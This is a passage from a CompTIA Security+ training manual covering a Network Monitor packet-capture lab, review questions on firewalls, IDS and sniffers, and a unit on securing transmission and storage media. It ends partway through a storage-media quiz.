Both servers should have                                                 Network Monitor installed.
the FTP server service
and Network Monitor              2 Expand Services and
installed.                         Applications

                                 3 Expand Internet
                                   Information Services

                                 4 Expand FTP Sites

                                 5 Ensure that the Default FTP Site      Start the Default FTP Site if it's stopped.
                                   is started

                                 6 Click Start

                                   Choose Administrative
                                   Tools, Network Monitor

                                 7 On the menu bar, choose
                                   Capture, Start

                                 8 Open a Command window

                                 9 Type ftp <your partner’s IP           You might also use the IP address of your own
                                   address>                              server.

                                10 Enter Administrator for the
                                   user

                                   Enter password for the password

                                11 Once you are logged on, enter
                                   quit

                                12 Switch back to the Network Monitor

                                   Choose Capture, Stop

                                   Click View


                                                                         Information displayed will be similar to that
                                                                         shown in Exhibit 9-9.

                                13 Close all windows                    Do not save the capture.
9–34     CompTIA Security+ Certification

Do it!              G-3:      Reviewing Network Monitor
                      Questions and answers
                       1 Network Monitor captures and displays which of the following? (Choose all that
                         apply.)
                          A    Source address
                          B    Destination address
                          C    Protocol
                          D    Data
                          E    All of the above

                       2 Which of the following security features is available for the full version of
                         Network Monitor?
                          A    Identify Network Monitor Users
                          B    Intrusion detection system add-on
                          C    Packet modification tools
                          D    Password Sniffing tools

                       3 Network Monitor will allow you to view encrypted data in plain text. True or
                         false?

                          False: Encrypted data is unreadable.

                       4 Which of the following protocols sends passwords and data in clear text? (Choose
                         all that apply.)
                          A    Telnet
                          B    FTP
                          C    HTTP
                          D    NNTP
                          E    IMAP
                          F    POP
                          G    SNMP
                          H    All of the above

                       5 Network Monitor will capture all data sent to your NIC by default. What can be
                         used to narrow the scope of the data collected?
                          A    A NIC in promiscuous mode
                          B    A screen
                          C    A filter
                          D    A strainer
                                                             Network devices     9–35

6 Network Monitor is considered a sniffer. Which of the following is a
  characteristic of a sniffer?
  A      Logging
  B      Fault analysis
  C      Performance analysis
  D      All of the above

7 A sniffer can be dangerous because it is very difficult to detect and can be
  attached to almost any part of a network. True or false?

  True
9–36      CompTIA Security+ Certification


Unit summary: Network devices
Topic A              In this topic, you learned that a firewall creates a virtual barrier between an internal and
                     external network. It accomplishes this through network address translation, packet
                     filtering, stateful packet inspection, application gateways, and access control lists.
                     You also learned that the steps involved in drafting a security policy include
                     determining what devices require protection, identifying the potential threats, disabling
                     non-essential services, and identifying who requires access to the network and who will
                     administer it.
Topic B              In this topic, you learned how routers and gateways are used within the networking
                     environment and how to safeguard their security. You learned about the various servers
                     found in the demilitarized zone, including bastion hosts, honey pots, and application
                     gateways. You also examined the Open Systems Interconnection (OSI) stack and
                     how it applies to packet filtering on the router.
Topic C              In this topic, you learned the steps to take to secure a switch. You identified the
                     vulnerabilities intrinsic in switches and how they can be overcome using virtual local
                     area networks (VLANs), Secure Shell (SSH), and installation behind a firewall.
Topic D              In this topic, you learned how to protect Private Branch Exchange (PBX), modems,
                     and wireless devices against intrusion. You learned that these are often overlooked
                     when developing a security policy and require special diligence to overcome their
                     vulnerabilities.
Topic E              In this topic, you learned how to secure remote access connections using Virtual
                     Private Networks (VPNs) and Remote Access Service (RAS) technologies.
Topic F              In this topic, you studied the Intrusion Detection System (IDS). You learned that the
                     IDS offers the ability to analyze data in real time to detect, log, and stop misuse or
                     attacks as they occur. You also learned about the various types of Intrusion Detection
                     Systems.
Topic G              In this topic, you learned about the characteristics of network sniffers and how to use
                     Microsoft Network Monitor to monitor traffic on the network.

                     Review questions
                       1 What is a firewall?
                         A hardware or software barrier that isolates one network from another.

                       2 Answering the following questions provides you with what? What is being
                         protected, from whom is it being protected, what services does the company need to
                         access over the network, who gets access to which resources, and who administers
                         the network.
                         You can draft a robust security policy, by answering those questions.

                       3 What do firewalls protect against?
                         Firewalls effectively protect against malicious packets from the outside and unauthorized Internet
                         access from within the company.

                       4 List the techniques typically used by firewalls to protect networks.
                         NAT, packet filtering, SPI, and ACL
                                                                      Network devices       9–37

 5 PAT is a subset of NAT. True or False?
   True

 6 What is a router?
   A network management device that sits between different network segments and routes traffic
   from one network to another.

 7 A DMZ is used for servers on a battlefield. True or False?
   False: DMZ in network terms is the area that a company sets aside for servers that are publicly
   accessible or have lower security requirements than other internal servers.

 8 What is a bastion host?
   A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services.

 9 What is another name for an application gateway?
   Proxy server

10 List the layers of the OSI model.
   1 Physical
   2 Data Link
   3 Network
   4 Transport
   5 Session
   6 Presentation
   7 Application

11 Which devices work at layer 1 of the OSI model?
   A Bridge
   B Switch
   C   Repeater

   D   Hub
12 Which Layer 2 device can limit the functionality of sniffing?
   A A bridge
   B A hub
   C A switch

   D A router
13 Why should you configure a switch using a physical connection to it?
   If you use Telnet or HTTP protocols to access the switch remotely, these are both open text
   protocols that can be intercepted leading to compromising of the security of the switch
   configuration.

14 What feature is used for cable network security that provides authentication and
   packet filtering?
   DOCSIS
9–38   CompTIA Security+ Certification

                  15 What steps can you take to make RAS connections more secure?
                      Use a bastion host running only RAS and protected by application gateway software or firewall
                      software. To further enhance security, use the encryption and mandatory callback features
                      offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server,
                      they will still have to break through the firewall to get useful information

                  16 VPN tunnels typically use IPSec encryption. True or False?
                      True

                  17 Intrusion detection systems (IDS) offer the ability to analyze data in real time to
                     detect, log, and stop misuse or attacks as they occur. True or False?
                      True

                  18 Host-based IDS systems are usually dedicated platforms with two components: a
                     sensor, which passively analyzes network traffic, and a management system, which
                     allows security personnel to configure the sensors and provides alarms or feedback
                     to the administrator. True or False?
                      False: This is a description of a network-based IDS.

                  19 How does anomaly-based detection work?
                      Anomaly-based detection involves building statistical profiles of user activity and then reacting to
                      any activity that falls outside these profiles.


                  Independent practice activity
                  In this exercise, you test your computer for Internet Security. You must have an Internet
                  connection to begin this exercise.
                    1 At your server, go to the Gibson Research Corporation Web site:
                              http://grc.com/default.htm.
                    2 Click on the ShieldsUp! link. You might have to scroll down to see the link.
                    3 On the resulting Shields Up! page, scroll down midway and click on the Proceed
                      button. Click Yes.
                    4 Click on the File Sharing button.
                    5 Your computer system will be tested for file system security. If you have a printer
                      available, print the results of the test noting any system vulnerabilities.
                    6 Scroll down the page and click on the Common Ports button.
                    7 Your computer system will be tested for security related to ports that are commonly
                      used. If you have a printer available, print the results of the test noting any system
                      vulnerabilities.
                    8 Repeat the process of checking your computer by clicking on the All Service Ports,
                      Messenger Spam and Browser Headers buttons respectively after each previous test
                      has completed.
                    9 When you've completed all tests, return to the GRC Web site at
                      http://grc.com/default.htm and again click on the ShieldsUp! link.
                  10 Close all open windows.
                                                                10–1


Unit 10
Transmission and storage media
                       Unit time: 60 minutes

                       Complete this unit, and you’ll know how to:

                       A Identify the various types of transmission
                          media and describe how to physically
                          protect the media.

                       B Identify the various types of storage media
                          and discuss ways to mitigate the risk of
                          catastrophic data loss.
10–2      CompTIA Security+ Certification


Topic A: Transmission media
                     This topic covers the following CompTIA Security+ exam objective:

                      #       Objective

                      3.2     Understand the security concerns for the following types of media
                                • Coaxial Cable
                                • UTP / STP (Unshielded Twisted Pair / Shielded Twisted Pair)
                                • Fiber Optic Cable




                     Types of transmission media
Explanation          At the core of internetworking technology is the Open Systems Interconnect (OSI)
                     model. The first layer (Physical layer) of the model deals with the transmission media,
                     which includes:
                            • Coaxial cable
                            • Twisted pair copper cable (shielded and unshielded twisted pair)
                            • Fiber-optic cable
                            • Wireless connections

                     Coaxial cable
                     Coaxial cable has a single wire conductor surrounded by an insulating material, which
                     in turn is surrounded by a braided metal shield (see Exhibit 10-1). Coaxial cable tends to
                     be more expensive than traditional telephone wiring, but is much less prone to
                     interference. Vulnerabilities include cable breaks and malicious tapping.
                     There are actually three types of coaxial cable used in networking:
                        • RG-8
                            • RG-58
                            • RG-59




                     Exhibit 10-1: Coaxial cable
                                                Transmission and storage media     10–3

RG-8
RG-8, also referred to as 10Base5 or ThickNet, is the oldest form of coaxial cable. It
uses baseband (single channel) signaling and 50-Ohm terminators. It is primarily used
as a backbone in an Ethernet LAN environment and often connects one wiring closet to
another. It can transmit data at speeds up to 10 Mbps, cover distances up to 500 meters,
and can accommodate up to 100 nodes per segment. Up to five segments can be daisy-
chained. Due to its rigidity, it is difficult to work with.

RG-58
RG-58, also called 10Base2 or Thinnet (thin coaxial cable), uses baseband signaling and
50-Ohm terminators. It is the more popular form of coaxial cabling for Ethernet
networks. Thinnet is capable of covering up to 185 meters and is not highly susceptible
to noise interference. It transmits at 10 Mbps and can support up to 30 nodes per
segment. Up to five segments can be daisy-chained.

RG-59
RG-59 is the familiar coax cable used for cable TV and cable modems. It is rated 75
Ohms and offers broadband (multiple channels) transmission. RG-59 is able to transport
both analog and high-speed digital signals, allowing for data, voice, and video
capabilities.
Note: It is important to know that 50-ohm and 75-ohm cabling are not interchangeable.

Twisted pair cable
Twisted pair cable is a popular wiring type for LANs. Individual wires are twisted
together to prevent cross talk between pairs and to reduce the effects of electromagnetic
interference (EMI) and radio frequency interference (RFI). EMI is interference in signal
transmission or reception and is caused by the radiation of electrical or magnetic fields,
which are present near power cables, heavy machinery, or fluorescent lighting. Twisting
the copper wires together and wrapping them in a plastic outer casing can lessen this
type of interference. It is a very inexpensive alternative to coaxial cable, but cannot
support the same distances. Twisted pair copper cable has long been used by telephone
companies, and most buildings in North America are pre-wired with one version of it,
unshielded twisted pair (UTP). An example is shown in Exhibit 10-2.




Exhibit 10-2: Unshielded twisted pair cable
10–4   CompTIA Security+ Certification

                  The difference between UTP and shielded twisted pair (STP) is an extra foil shield that
                  is wrapped between the copper pairs to provide additional protection from EMI (Exhibit
                  10-3).




                  Exhibit 10-3: Shielded twisted pair cable

                  Twisted pair is further classified into different categories based on the data transmission
                  rates it can sustain. The most common types of cables are Category 3 (CAT 3),
                  Category 5 (CAT 5), and most recently Category 6 (CAT 6).
                      • CAT 3 is the minimum requirement for 10Mbps Ethernet and voice systems.

                      • CAT 5 is required to support Fast Ethernet (100Mbps) and uses an 8-pin
                        configuration that can be modified for use as a crossover cable, a straight-
                        through cable, or a customized cable.
                      • CAT 5E is a higher grade CAT5 cable.
                      • CAT 6 is a newer technology that is capable of supporting Gigabit Ethernet
                        (1000 Mbps) and is backwards compatible and also uses an 8-pin configuration.
                        Twisted pair connects to hardware using an RJ-45 connector, which looks very
                        similar to a phone jack, but is a bit larger (Exhibit 10-4).




                  Exhibit 10-4: RJ-45 connector

                  Note: It is important to know that twisted pair is very easily spliced, which allows
                  unauthorized users access to the network. A discussion of these types of problems
                  follows later in the unit.
                                                         Transmission and storage media             10–5

Fiber-optic cable
Fiber-optic cable is the newest form of cable available. It comprises a glass core that is
encased by a plastic outer covering. It is also much smaller, lighter, more fragile, and
susceptible to damage than coaxial cable or twisted pair (Exhibit 10-5).




Exhibit 10-5: Fiber-optic cable

Instead of an electrical current (like coaxial and twisted pair), fiber-optic cable carries
light. It is capable of transmitting more data much further than other wiring types and is
immune to the effects of EMI. Perhaps the biggest benefit of using fiber-optic cable is
that it is nearly impossible to splice without detection. In order to effectively split a
fiber-optic signal, the core must be disrupted, thus allowing for ease of detection by a
network administrator.
The biggest disadvantages to fiber are its cost and its difficulty to install and
manipulate. The table below provides a comparison of the three types of wired
transmission media just discussed.

 Media               Advantages                             Disadvantages

 Coaxial cable       High bandwidth, long distances,        Physical dimensions (can be bulky and
                     relative EMI immunity                  difficult to work with), easily tapped, single
                                                            cable break brings the network down

 Twisted pair        Inexpensive, widely used, easy to      Most sensitive to EMI, supports short
 copper cable        add nodes, single cable break          distances, easily tapped
                     won’t bring the network down

 Fiber-optic cable   Very high bandwidth, EMI               Most expensive, difficult to implement
                     immunity, long distances




Wireless
Unguided transmissions of data use various technologies including microwave, radio,
and infrared to receive and transmit over airwaves. Wireless was previously discussed at
length, yet it is important to realize that it too is a form of transmission media and
should be considered when thinking about implementing and securing networks. Much
like coaxial cable and twisted pair copper cable, unguided transmission methods are
vulnerable to security breaches in which unauthorized users intercept data flows. The
most important distinction is that because unguided connections cannot easily be
physically contained like the media, it is much more difficult to secure.
10–6     CompTIA Security+ Certification

Do it!              A-1:      Discussing transmission media
                      Questions and answers
                       1 Thinnet can transmit data at speeds up to __________.
                          A    100 Mbps
                          B    50 Mbps
                          C    10 Mbps
                          D    5 Mbps

                       2 A(n) __________ is a standardized connector used to connect twisted pair copper
                         cable to a piece of networking equipment.
                          A    DL-17
                          B    RJ-45
                          C    RJ-54
                          D    RJ-11
                          E    LD-71

                       3 Fiber-optic cable is comprised of a __________ core.
                          A    plastic
                          B    copper
                          C    gold
                          D    glass

                       4 Fiber-optic cable uses __________ to transmit data.
                          A    EMI
                          B    electrical current
                          C    light
                          D    vibrations

                       5 __________ is the most secure of the physical transmission media.
                          A    Coaxial cable
                          B    Twisted pair copper cable
                          C    Fiber-optic cable

                       6 __________ is the most inexpensive transmission media.
                          A    Coaxial cable
                          B    Twisted pair copper cable
                          C    Fiber-optic cable
                                                       Transmission and storage media   10–7

7 Twisted-pair cable is the most widely known by the general public because it is
  the primary type of cabling used for cable television. True or false?

  False. Coaxial cable is used for cable television.

8 CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems.
  True or false?

  True

9 CAT 5 is required to support Fast Ethernet (100 Mbps). True or false?

  True
10–8      CompTIA Security+ Certification

                     Securing transmission media
Explanation          Many unauthorized users intend to harm an organization by accessing the network
                     infrastructure. To counteract this type of activity, the implementation of an extremely
                     secure infrastructure can be very expensive, yet cutting corners when securing
                     transmission media can make an organization an easy target. A balanced approach must
                     be followed when making security decisions.
                     The most vulnerable aspect of a network is the data flow. Network infrastructures may
                     be very complex and span significant geographic distances. These interdependent pieces
                     of the network can be easily compromised when a wire or cable is tapped or spliced.
                     Common attacks include interception and interruption of traffic:
                          • Interception of traffic usually involves the tampering of physical media as it
                             crosses non-secure areas. For example, coaxial cable or twisted pair is
                             sometimes used to connect separate floors in an office building. The space
                             between floors may be unsecured by the company or organization and accessible
                             by potential attackers using a simple splice of the cable.
                         • Interruption of traffic is caused by rendering network access devices inoperable.
                           This can happen when a potential attacker has access to a wiring closet or LAN
                           closet. Damage to networking equipment is easy to accomplish once access is
                           gained.
                     Attacks that are more difficult involve unauthorized eavesdropping or sniffing of
                     network traffic because it typically requires physical access. If the network is
                     compromised in such a way that this can occur, most of the work to attack the integrity
                     of a network has already been done. Common scenarios include:
                         • Inserting a node that has the ability to intercept network traffic using a sniffer or
                           some other packet analyzer.
                         • Modifying switch or router configurations to bypass network security devices
                           such as firewalls.
                         • Resetting an interior node so that its data flows are exported to an external path.
                         • War driving, a common problem with wireless transmissions.
                     Altering data flows on the network compromises the integrity of the network. Potential
                     damage can include the corruption of data, sabotage of core business plans, and
                     impersonation of corporate nodes to gain even further access. This can be accomplished
                     by cracking passwords obtained using a sniffer.

                     Physical security
                     Network devices are usually easy targets because most organizations do not have a
                     permanent person on duty to protect the equipment in its physical location. A locked
                     door on a wiring closet is not enough if that space is shared with phone companies or
                     other external vendors. If the space is shared, enclosed racks that can be locked should
                     be purchased. Only authorized employees who need access to the network equipment
                     are given a key. Another added layer of security in this instance is to install closed
                     circuit security cameras that are monitored as part of the standard security of the
                     building.
                     In a large Web complex or data center, raised floors are a great place for attackers to
                     hide devices that are tapped into the network. There are floor tiles available that you can
                     fasten to the floor to provide another layer of security. It is also a good idea to monitor
                     the floor area with regular inspections looking for unauthorized equipment.
                                                 Transmission and storage media     10–9

It is extremely difficult to ensure the security of physical cabling. Both coaxial cable
and twisted pair are easily spliced. The most vulnerable places for gaining unauthorized
access to cabling are between buildings or floors. Sometimes, the distance between the
points is large enough to require fiber-optic cable, which gives the added benefit of
more security. However, the majority of interfloor connections still use some form of
copper wire, which makes the physical security of that connection all the more
important.

Electromagnetic emissions
Despite all of the physical security that can be implemented, it is still possible for
attackers to eavesdrop on data flows by listening for electromagnetic emissions from
workstations and other nodes. There are several ways to protect against this. If possible,
purchase and use equipment that is designed to limit or eliminate the signal leaks. This
can be very expensive. Fiber-optic cable is especially good at eliminating this type of
risk.
Another way to stop eavesdropping through electromagnetic emission is to encrypt the
data flows using various different encryption technologies. This way, even if an attacker
has access to the flows, the data is useless without a key to decrypt the data.

Power interruptions
In many situations, LAN and wiring closets tend to share spaces with power sources and
other utilities. This exposes the network to a failure risk even without a threat of an
attacker. Should there be a fire, the network can be showered with water or other fire
retardants. Several dry methods for fire extinguishing can be used and should be
investigated when securing a network.
Many LANs are also completely reliant on a power supplier for all the power to the
network. Deploying an uninterruptible power supply (UPS) can mitigate this risk by
providing temporary power during a brief outage.

Interruption of services
Another way to secure the infrastructure is to implement a redundant network (having
multiple devices in the same function). In this instance, if a network device becomes
compromised, it does not necessarily mean that the entire network is compromised. A
backup device can be available to take over the duties of the disabled piece of
equipment.

War driving
The media has covered many cases of war driving. Literally, war driving is using a
laptop’s wireless network interface card set in promiscuous mode to pick up unsecured
wireless signals. Today, hackers are war driving, or LAN-jacking, wireless networks for
anonymous and free high-speed Internet access or purely for access to a network.
War driving requires no elaborate software or hardware. An ordinary wireless NIC set
in promiscuous mode easily latches on to open wireless network beacons. Using a
global positioning satellite (GPS) receiver in conjunction with wireless network
interface cards, hackers are mapping major metropolitan areas and compiling a list of
wireless networks, both secured and unsecured. One of the best ways to defend against
such attacks is to use a VPN or other encryption technology when using wireless LANs.
10–10 CompTIA Security+ Certification

                    Thorough attention to the security of the infrastructure is one of the least expensive
                    means of preventing successful compromises of the system. While stronger security
                    appliances and extensive infrastructure choices help make more secure networks,
                    careful design and implementation is necessary. Mapping out cabling and deploying
                    fiber optics in unsecured areas can help mitigate the risk of eavesdropping.

Do it!              A-2:     Securing transmission media
                     Questions and answers
                      1 A(n) __________ can mitigate the risk of power outages and network downtime.
                         A    surge protector
                         B    UPS
                         C    EMI
                         D    ACL

                      2 What is the most likely area for an intruder to try to gain access to physical
                        network media?

                         A non-secure area, such as the space between floors where coaxial or twisted pair media
                         may be connecting separate floors in an office building.

                      3 What are some of the ways you can minimize eavesdropping of electromagnetic
                        emissions?

                         Use fiber optic cable and/or encrypt data.

                      4 What is another term for war driving?

                         LAN-jacking
                                                                      Transmission and storage media   10–11


Topic B: Storage media
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.2   Understand the security concerns for the following types of media
                      • Removable media
                          • Tape
                          • CD-R (Recordable Compact Disks)
                          • Hard Drives
                          • Diskettes
                          • Flashcards
                          • Smartcards




              Fixed and removable storage media
Explanation   Computer users are constantly creating and transporting files that need to be stored and
              used later. Storage media provides a way to hold data at rest.
              Perhaps the most common type of storage media is a hard disk drive. Every computer
              has a permanent hard drive as part of its hardware configuration. The hard drive can
              store a multitude of information, from operating systems to software to personal files.
              Hard disk drives were developed by IBM in the 1970s and are ubiquitous today.
              Removable storage media has been around nearly as long as the computer itself and
              goes back to the times of the punch card. Advancements in computer technology
              brought about magnetic storage devices that are much more efficient and can store
              much larger amounts of data. Today there are three major types of storage media:
              magnetic, optical, and solid-state.
10–12 CompTIA Security+ Certification

                    Magnetic storage media
                    Magnetic storage media is coated with some form of iron oxide. When data is recorded
                    to the media, an electromagnet inside the disk drive rearranges the iron oxide particles
                    into a series of patterns that represent 0s and 1s. These patterns can be readily identified
                    later. When the data is retrieved, the reading disk drive uses a magnetic field to read
                    what the pattern is. This pattern is then translated into data that is sent to the computer in
                    binary form. The most prominent forms of magnetic storage media in use today are
                    shown in Exhibit 10-6.




                    Exhibit 10-6: Various storage media


                    Floppy disks
                    The first floppy disks were not rigid or encased in hard plastic as they are today. The
                    size of the floppy has changed several times—the original floppy disk measured 8
                    inches across. A 5.25-inch disk was then developed, and finally the 3.5-inch disk that is
                    now commonly used. Other types of floppy disks also exist, but the most common is the
                    3.5-inch, high density, which holds about 1.44 MB of data.
                    The 3.5-inch floppy disk has a circular magnetic piece of plastic, which is placed inside
                    a rigid plastic case for protection. To help avoid data loss, carrying disks in a waterproof
                    case helps prevent water or dust from damaging the disk. Keep floppy disks away from
                    anything that might hold a magnetic or electrical field, such as a mobile phone, radio,
                    metal tools or paper clips that have been stored in a magnetic paper clip holder. Because
                    floppy disks are made of magnetic material, any other magnetic material can erase or
                    damage data on the floppy disk. Store floppy disks in an area with a temperature
                    between 32° and 140° F. Although the floppy disk was once the primary type of
                    magnetic removable media, it is quickly being replaced by larger-capacity magnetic
                    disks.

                    Cartridge disks
                    Cartridge drives were popular in the 1990s. They gave users more capacity than the 1.44
                    MB floppy disks had. Users were comfortable with removable disk storage—they had
                    been using the floppy disks. Removable disk storage has changed a lot over the years—
                    from the basic floppy disk to the Bernoulli box to the REV drive. Popularity of cartridge
                    drives has declined with the rise in availability of CD and DVD recordable media and
                    drives.
                                               Transmission and storage media   10–13

The Iomega Company has created many of the cartridge drives and related media. The
first of these was the Bernoulli Box. It was originally offered with 5, 10, and 20 MB
disk choices. Over the years they increased the disk capacity up to 230 MB. The disks
were Mylar disks (like in a floppy disk), in approximately 5.25 inch sturdy cartridge
cases.

Zip drives
Another popular solution was the Iomega Zip drive. This was slightly larger than a 3.5”
floppy disk. The original capacity was 100 MB. Later versions were 250 and 750 MB.
The 750 MB drive could read 100 MB cartridges, but not write to them. The 250 MB
drive could read and write to 100 MB cartridges, but at a slower speed than to 250 MB
cartridges. It was available with parallel, SCSI, and USB interface options.
Zip disks are prone to getting dirty and the drives were prone to heads becoming
misaligned. This caused problems reading the disks. The head arm would be rapidly
snapped into the drive and out again, creating a click. This became known as the “click
of death.” It often tore the edge of the disk and sometimes damaged the head as well.
Damaged disks could also damage other drives if the disk was tried in another drive.




Exhibit 10-7: Zip drive and cartridge


Jaz drives
Another storage solution Iomega introduced was the Jaz drive. It had 1 GB and 2 GB
cartridges that used Winchester hard drive technology. They were available in SCSI and
USB interface models.

REV drives
The current Iomega offering is the 35 GB REV drive. The read/write heads and
controller are contained in the drive. They can be connected via USB, SCSI, FireWire,
and ATAPI interfaces.
10–14 CompTIA Security+ Certification

                    Imation drives
                    The other major player in the removable cartridge storage solution was Imation, a 3M
                    company. Their product was the SuperDisk. The LS-120 and LS-240 models had 120
                    MB and 240 MB capacity respectively. These drives can also read standard 1.44 MB
                    floppy disks.
                    The drives were not common. They came out after Iomega Zip drives had already been
                    out for several years. They were slow and prone to reliability problems. People liked
                    them because they could read standard floppy disks.

                    Tape drives
                    There are also numerous magnetic storage technologies such as quarter inch cartridge,
                    digital audio tape (DAT), and digital linear tape (DLT) that are variations on tape drives
                    and can store up to 13 GB of information. These types of media are primarily used to
                    backup large amounts of data.

                    Optical storage media
                    Optical storage media uses light and reflection to transmit data. There are different types
                    of optical storage, the most common being the compact disc (CD) as shown in Exhibit
                    10-8.




                    Exhibit 10-8: Compact disc

                    A CD is a plastic disc covered by a layer of aluminum and a layer of acrylic. Data is
                    recorded onto a CD by creating very small bumps in the aluminum layer on long tiny
                    tracks. The data is then read by a laser beam. As the laser hits the bumps in the tracks,
                    an optical reader called an optoelectronic sensor detects the changing pattern of
                    reflected light from the bumps in the aluminum coating. This pattern is then translated
                    into bits and sent to the computer.
                    Although many CDs are produced professionally, it is now possible to make a CD with
                    a personal computer. CD writers, or burners, record the data onto the aluminum coating,
                    creating the bumps that are read by the CD drive. A typical CD can store 700 MB of
                    data, which is approximately the same as 486 standard floppy disks. This means a CD
                    can store over three million pages of text or 20,000 graphic images. CDs are commonly
                    used to store multimedia, such as music or video, which need large amounts of storage
                    space. The most common forms of CDs are those that hold recorded music.
                                                 Transmission and storage media    10–15

CD-ROMs
The most common type of CD used with computers is the CD-ROM. Material can be
written or recorded to the disc only once, usually by a professional CD-ROM producing
company. CD-ROMs hold prerecorded materials to be used on a computer, such as
software, graphic images, short video clips, or audio. When you purchase a new piece of
software, it normally comes on a CD-ROM and is installed using the CD-ROM drive.

CD-Rs
Compact disc-recordable (CD-R) is another type of CD. It is similar to audio CDs and
CD-ROMs. However, unlike a CD or a CD-ROM, which is purchased prerecorded, a
CD-R is a blank CD. Data is recorded onto the CD-R by using a CD-R drive.
CD-Rs are perfect for storing large amounts of data. Like other types of CDs, CD-Rs
hold about 700 megabytes of data. They can be used to store older documents or files
that you want to save but do not need to access daily. Many people use CD-Rs to
distribute files to others and to backup files.
Although CD-R discs appear to be identical to other types of CDs, instead of having an
aluminum layer on which the data has been prerecorded using bumps, a CD-R has a
layer of light-sensitive dye on top of a layer of reflective gold. Using the CD-R drive,
the data is burned or recorded on the disc with a high-powered laser beam. Instead of
creating bumps in the aluminum layer like a prerecorded CD, the laser changes the color
of the light-sensitive dye by pulsing in patterns.
CD-Rs can have data recorded onto it only one time. Hence, it is called a write once,
read many (WORM) type of media. The next step in CD technology is the compact
disc-rewriteable (CD-RW). A CD-RW disk is very similar to a CD-R disk, except that it
can be recorded onto more than once. The layer of dye is different and can be rewritten
multiple times, so you can write, delete, and rewrite to the same CD. The CD-RW drive
is similar to the CD-R drives, with the additional abilities to record or write over data on
the same disc. Both the CD-RW discs and CD-RW drives are more expensive to
purchase than CD-R discs and drives.

DVDs
The DVD is becoming a popular type of permanent optical storage. Primarily used to
store full-length feature films, the DVD is similar to a CD, but with a much larger data
capacity. A DVD holds about seven times as much data as a regular CD. Like CDs,
DVDs are also made out of plastic with a layer of gold, covered by a thin layer of clear
polymer. The difference is that the tracks on a DVD are much thinner and placed closer
to each other, so many more tracks fit on a disc, allowing more space for recorded data.
In addition, DVDs can be recorded on both sides, doubling the amount of storage space
available.

Solid-state storage media
Solid-state is a newer type of removable storage media. This technology usually consists
of a microchip and has no moving parts, which is why it is called solid-state. Data is
recorded directly into the microchip in digital form.
10–16 CompTIA Security+ Certification

                    There are several popular types of solid-state media currently being used, as shown in
                    Exhibit 10-9. Called “flash memory,” these media are used primarily in digital cameras,
                    digital video cameras, digital audio recorders, PDAs, and camera cell phones. Solid-
                    state media is physically very small, yet can contain up to at least 2 GB of memory.




                    Exhibit 10-9: Solid-state storage media

                    External flash memory readers can access a flash memory card just as if it were an
                    additional hard drive on a computer. Because the computer considers the files on the
                    memory card already on the computer, using these files is just like using any other file
                    on the computer. Removable solid-state storage media can be used with devices, or
                    drives, that are either internal or external. These devices communicate with the
                    computer through interfaces in the form of cables and connectors that connect the
                    device to the CPU or the motherboard.
                    Because there are no moving parts to break, solid-state media is more reliable and
                    durable than conventional hard disk drives. It requires no battery to retain its data. Many
                    other devices such as wireless phones and personal digital assistants (PDAs) also use
                    solid-state media for storage.
                    There currently are several popular types of solid-state media, including CompactFlash,
                    SmartMedia, memory sticks, and secure digital/multimedia cards.

                    CompactFlash
                    The CompactFlash card is a very small type of storage, measuring only 1.7 inches by
                    1.4 inches, and less than a 1/4 of an inch thick. It weighs a mere half-ounce. Even with
                    this small size, a CompactFlash card currently can store up to 4 GB of data. Many
                    digital devices cannot handle this large storage size, so a more common storage capacity
                    is between 8 and 128 MB.

                    SmartMedia
                    The SmartMedia card is similar to the CompactFlash, but is even thinner and lighter.
                    Many devices use SmartMedia cards, including digital still cameras, MP3 recorders, and
                    newer printing devices. These cards can store only up to 64 MB of data, unlike
                    CompactFlash cards, which can store up to 1 GB. However, SmartMedia cards are less
                    expensive than CompactFlash cards. Like the CompactFlash cards, SmartMedia cards
                    have a high data transfer rate and are resistant to extreme weather conditions.
                                                  Transmission and storage media   10–17

Memory Stick
Another popular type of removable data storage is the Memory Stick. About the size of
a stick of chewing gum, the Memory Stick can hold up to 8 GB of data. Memory Sticks
are commonly used with digital still cameras, digital music players (MP3), digital voice
recorders, and other digital devices. It has some of the same features as the
CompactFlash card and the SmartMedia card, including a high data transfer rate,
resistance to extreme temperatures, and high storage capacity.

Secure digital/multimedia cards
Secure digital/multimedia cards are primarily used in MP3 players and digital cameras.
These SD/MMC memory cards are about the same size as SmartMedia cards, but
thicker and have their own controller like CompactFlash cards. These cards can store up
to 8 GB.

Flash memory drives
USB flash memory drives can be plugged into any USB port. Files can then be copied
to or from the computer or network. This can lead to unwanted files being introduced to
the computer or network. It can also result in theft of files from the computer or
network. Some of these devices are also bootable which can lead to additional security
problems such as the introduction of viruses.
In some school and business settings, the ability to use devices such as removable flash
drives is disabled. If one of these drives is detected, the drive does not show up. This is
to prevent the introduction of viruses on the network. Also, some companies do not
allow their use since these small devices can be easily concealed and used to steal
information from the business.

Catastrophic loss
When dealing with the various types of storage media, it is important to try to mitigate
the risk of a catastrophic loss of data. The simplest way to do this is to make backup
copies of any sensitive information and store the copies in a safe place. Information that
is so vital that business operation could be threatened if lost should be stored at a
separate, secure location preferably in a fire safe. It is also very important to use a type
of media that is less likely to be corrupted or damaged, with solid-state media being the
best choice in this instance. Magnetic media is very easily damaged or erased, and
optical media is easily scratched and made unreadable.

Encryption
To guarantee that sensitive information does not fall into the wrong hands, any
organization should implement a thorough encryption policy. At no time should
business-critical information be stored in an unencrypted fashion. All of the media
discussed above are compatible with encryption technologies. The key to a successful
encryption policy is to educate the entire organization as to the importance of
safeguarding sensitive data. If one person takes a floppy disk off-site with unencrypted
data, the entire company has been compromised.
10–18 CompTIA Security+ Certification

                    Storing and destruction of media
                    Once data has been transferred to some type of storage media, it is important to have a
                    policy that tracks the content of each disk and where it is located. The medium itself
                    should be well marked with a standardized naming scheme to avoid confusion. As part
                    of the policy, a clear and concise reporting structure should be implemented to account
                    for any missing storage media. All copies should be kept in a secure location until they
                    are no longer needed.
                    Once the data has become obsolete (the timeframe varies by organization), it is
                    necessary to dispose of the media appropriately. This can be done by physically
                    destroying the media, thereby rendering it unreadable, or by merely erasing the data if it
                    is on a medium that is erasable.
                    Note: A crafty hacker need only go through a company’s dumpster to likely find all
                    types of data from floppy disks, old tape, even hard disks from servers that are no longer
                    needed or were damaged. Keep in mind that just because a disk drive dies does not
                    mean the data cannot be recovered. A strong policy that ensures the complete
                    destruction of all discarded storage media should be in place and followed.

Do it!              B-1:     Discussing storage media
                     Questions and answers
                      1 The most common size for floppy disks today is:
                         A      3.5 inches
